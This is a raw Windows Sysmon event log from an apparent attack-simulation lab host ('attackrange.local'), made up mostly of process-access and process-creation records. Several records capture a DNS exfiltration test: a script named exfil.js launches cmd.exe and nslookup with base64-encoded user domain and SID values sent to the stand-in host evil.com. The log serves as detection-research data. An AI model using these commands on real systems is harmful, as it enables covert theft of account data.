14:16:46.495{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17CE-629A-2242-000000005F02}7832C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204558Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.495{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CE-629A-2242-000000005F02}7832C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204557Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.495{2E1864BB-17CE-629A-2242-000000005F02}78327432C:\Windows\system32\conhost.exe{2E1864BB-17CE-629A-2142-000000005F02}7252C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204556Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.479{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17CE-629A-2242-000000005F02}7832C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204555Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.479{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204554Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.479{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204553Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.479{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204552Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.479{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204551Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.479{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17CE-629A-2142-000000005F02}7252C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204550Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.479{2E1864BB-17A1-629A-783D-000000005F02}55526928C:\Windows\System32\WScript.exe{2E1864BB-17CE-629A-2142-000000005F02}7252C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204549Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.485{2E1864BB-17CE-629A-2142-000000005F02}7252C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfsicr.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000204548Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.479{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nliaeio.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000204547Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.442{2E1864BB-17CE-629A-1F42-000000005F02}77965556C:\Windows\system32\conhost.exe{2E1864BB-17CE-629A-2042-000000005F02}652C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204546Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.442{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204545Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.442{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204544Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.442{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204543Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.442{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204542Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.442{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CE-629A-2042-000000005F02}652C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204541Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.442{2E1864BB-17CE-629A-1E42-000000005F02}79082380C:\Windows\system32\cmd.exe{2E1864BB-17CE-629A-2042-000000005F02}652C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204540Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.449{2E1864BB-17CE-629A-2042-000000005F02}652C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CE-629A-1E42-000000005F02}7908C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nliaeio.tmp 2>&1 10341000x8000000000000000204539Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.426{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17CE-629A-1F42-000000005F02}7796C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204538Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.426{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CE-629A-1F42-000000005F02}7796C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204537Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.411{2E1864BB-17CE-629A-1F42-000000005F02}77965556C:\Windows\system32\conhost.exe{2E1864BB-17CE-629A-1E42-000000005F02}7908C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204536Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.395{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CE-629A-1F42-000000005F02}7796C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204535Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.395{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204534Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.395{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204533Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.395{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204532Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.395{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204531Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.395{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CE-629A-1E42-000000005F02}7908C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204530Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.395{2E1864BB-17A1-629A-783D-000000005F02}55522172C:\Windows\System32\WScript.exe{2E1864BB-17CE-629A-1E42-000000005F02}7908C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204529Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.404{2E1864BB-17CE-629A-1E42-000000005F02}7908C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nliaeio.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000204528Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:46.395{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlymbjgv.tmpMD5=0E5FCD35CD053EF552028604630DF807,SHA256=10CB74BA0B52EDCD250F65D3C712B6E8DE326D18DDB63A8E97ADD31848C9E0E2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000204527Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:44.081{00000000-0000-0000-0000-000000000000}3008<unknown process>-udptruefalse127.0.0.1-53097-false127.0.0.1-53domain 354300x8000000000000000204526Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 